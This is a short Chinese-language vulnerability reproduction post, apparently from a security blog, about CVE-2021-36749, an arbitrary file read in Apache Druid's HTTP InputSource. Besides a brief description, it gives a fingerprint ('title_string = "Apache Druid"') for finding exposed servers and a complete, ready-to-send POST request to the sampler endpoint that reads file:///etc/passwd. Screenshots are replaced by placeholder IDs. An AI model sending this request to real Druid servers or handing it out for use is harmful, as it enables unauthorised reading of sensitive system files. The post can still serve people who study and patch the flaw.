Apache Druid LoadData任意文件读取漏洞 #CVE-2021-36749

漏洞描述

由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。

漏洞影响

Apache Druid

网络测绘

title_string = “Apache Druid”

漏洞复现

508826d4c4013235

复现过程

4882cbbb2c013353

3bfaf87a97013506

请求包为

POST /druid/indexer/v1/sampler?for=connect
Accept: application/json, text/plain, */*

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

f43c3872c7013610

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容